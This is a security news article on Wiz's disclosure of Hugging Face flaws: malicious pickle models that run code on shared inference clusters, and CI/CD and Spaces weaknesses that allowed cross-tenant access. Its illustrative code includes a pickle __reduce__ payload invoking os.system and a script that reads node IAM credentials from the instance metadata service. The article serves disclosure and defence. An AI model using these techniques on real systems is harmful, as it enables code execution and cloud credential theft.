Source: www.databreachtoday.com
Artificial Intelligence & Machine Learning, Next-Generation Technologies & Secure Development
Researchers Say Illegal Access to Private AI Models Can Enable Cross-Tenant Attacks
Mihir Bagwe (MihirBagwe) •
April 8, 2024
Security researchers have discovered two critical vulnerabilities in the Hugging Face AI platform that could have allowed attackers to gain unauthorized access to customer data and models and to manipulate them.
The Google- and Amazon-funded Hugging Face platform is designed to help developers seamlessly access and deploy AI models. Researchers at Wiz teamed up with Hugging Face to find and fix two significant risks within the AIaaS platform’s infrastructure.
“If a malicious actor were to compromise Hugging Face’s platform, they could potentially gain access to private AI models, datasets and critical applications, leading to widespread damage and potential supply chain risk,” Wiz said in a report released last week.
The two distinct risks originate from the compromise of shared inference infrastructure and shared CI/CD systems. Such a breach could facilitate the execution of untrusted models uploaded in ‘pickle’ format on the service and enable the manipulation of the CI/CD pipeline to orchestrate a supply chain attack.
Pickle is a Python module for serializing and deserializing Python objects. It converts a Python object into a byte stream that can be stored on disk, sent over a network, or saved in a database; when the object is needed again, the byte stream is deserialized back into a Python object. Despite the Python Software Foundation’s acknowledgment of Pickle’s insecurity, the module remains popular due to its simplicity and widespread use.
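For readers unfamiliar with the module, a minimal round trip looks like this; the object and file name are purely illustrative:

```python
import pickle

# Serialize a Python object into a byte stream ("pickling").
config = {"model": "bert-base", "epochs": 3}
blob = pickle.dumps(config)

# The bytes can be written to disk, sent over a network, or stored in a database.
with open("config.pkl", "wb") as f:
    f.write(blob)

# Deserialize the byte stream back into a Python object ("unpickling").
with open("config.pkl", "rb") as f:
    restored = pickle.load(f)

assert restored == config
```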
Malicious actors could craft pickle-serialized models containing remote code execution payloads, potentially granting them escalated privileges and cross-tenant access to other customers’ models, explained Wiz researchers.
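The danger comes from Pickle’s __reduce__ hook, which lets an object specify a callable to be invoked during deserialization. The sketch below illustrates that class of payload, with a harmless echo standing in for an attacker’s command; it is an illustration of the technique, not Wiz’s actual exploit:

```python
import os
import pickle

# An object can define __reduce__ to dictate what gets called when it is
# unpickled. Here a harmless shell command stands in for a real payload.
class Payload:
    def __reduce__(self):
        return (os.system, ("echo code executed during unpickling",))

blob = pickle.dumps(Payload())

# Merely loading the bytes runs the embedded command -- no method call needed.
pickle.loads(blob)
```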
Attackers exploiting vulnerabilities in the CI/CD pipeline could inject malicious code into the build process. By compromising the CI/CD cluster, attackers could orchestrate supply chain attacks, potentially compromising the integrity of AI applications deployed on the platform.
Wiz researchers demonstrated the exploitation of these vulnerabilities in a YouTube video in which they upload a specially crafted pickle-based model to Hugging Face’s platform. Abusing Pickle’s insecure deserialization behavior, they executed remote code and gained access to the inference environment within Hugging Face’s infrastructure. “It is relatively straightforward to craft a PyTorch (Pickle) model that will execute arbitrary code upon loading,” Wiz said. Hugging Face is aware of this, but “because the community still uses PyTorch pickle, Hugging Face needs to support it,” Wiz added.
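In practice, a default torch.load() is enough to trigger such a payload, since PyTorch’s standard checkpoint format is itself a Pickle archive. Newer PyTorch releases (1.13 and later) accept a weights_only=True argument that restricts unpickling to plain tensor data. A short sketch, using a locally created toy checkpoint:

```python
import torch

# Save a toy checkpoint; PyTorch's default .pt format is a Pickle archive.
torch.save({"weight": torch.zeros(2, 2)}, "model.pt")

# Loading with default settings unpickles arbitrary objects, so an untrusted
# file could trigger embedded code exactly as in the sketch above.
state = torch.load("model.pt")

# weights_only=True restricts unpickling to tensor data and rejects
# arbitrary callables, mitigating this class of payload.
state = torch.load("model.pt", weights_only=True)
```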
Wiz’s investigation found that its model ran inside a pod in a cluster on Amazon Elastic Kubernetes Service, also known as EKS. The researchers exploited common misconfigurations to extract information that gave them the privileges needed to access secrets belonging to other tenants on the shared infrastructure, enabling lateral movement.
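Wiz did not publish every step, but a typical first check in such an environment is whether a pod can reach the node’s instance metadata service and read the node’s IAM role credentials. The sketch below assumes IMDSv1 is reachable from the pod and is purely illustrative of that class of misconfiguration:

```python
import urllib.request

# A common EKS misconfiguration check: if a pod can reach the node's
# instance metadata service (IMDSv1 assumed here), it may be able to read
# the node's IAM role credentials and escalate from there.
IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

try:
    role = urllib.request.urlopen(IMDS, timeout=2).read().decode()
    creds = urllib.request.urlopen(IMDS + role, timeout=2).read().decode()
    print("Pod can reach IMDS; node role exposed:", role)
except OSError:
    print("IMDS unreachable from this pod (hop limit or policy blocks it)")
```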
Wiz researchers also identified a weakness in Hugging Face Spaces, a hosting service for showcasing AI/ML applications and for collaborative model development. Wiz found that an attacker could execute arbitrary code during application build time and use that foothold to inspect network connections from the build machine. The examination revealed a connection to a shared container registry housing images belonging to other customers, which the attacker could manipulate.
Hugging Face said it has effectively mitigated the risks found by Wiz and has put in place cloud security posture management, vulnerability scanning and annual penetration testing to identify and mitigate future risks to the platform.
Hugging Face also advised users to replace pickle files, which inherently carry security issues, with Safetensors, a format the company devised to store tensors safely.
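Safetensors stores raw tensor bytes plus a JSON header, so loading a file cannot execute code. A minimal example of the format’s Python API, with illustrative tensor names:

```python
import torch
from safetensors.torch import save_file, load_file

# Safetensors holds raw tensor data plus a JSON header -- no code objects,
# so loading a file cannot trigger execution the way unpickling can.
tensors = {"weight": torch.zeros(2, 2), "bias": torch.zeros(2)}
save_file(tensors, "model.safetensors")

restored = load_file("model.safetensors")
assert torch.equal(restored["weight"], tensors["weight"])
```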
The vulnerabilities disclosed by Wiz mark the second set of flaws found in the AIaaS platform in the past four months. The company confirmed in December that it fixed critical API flaws that were reported by another cybersecurity company, Lasso Security (see: API Flaws Put AI Models at Risk of Data Poisoning).
Original Post url: https://www.databreachtoday.com/hugging-face-vulnerabilities-highlight-ai-as-a-service-risks-a-24807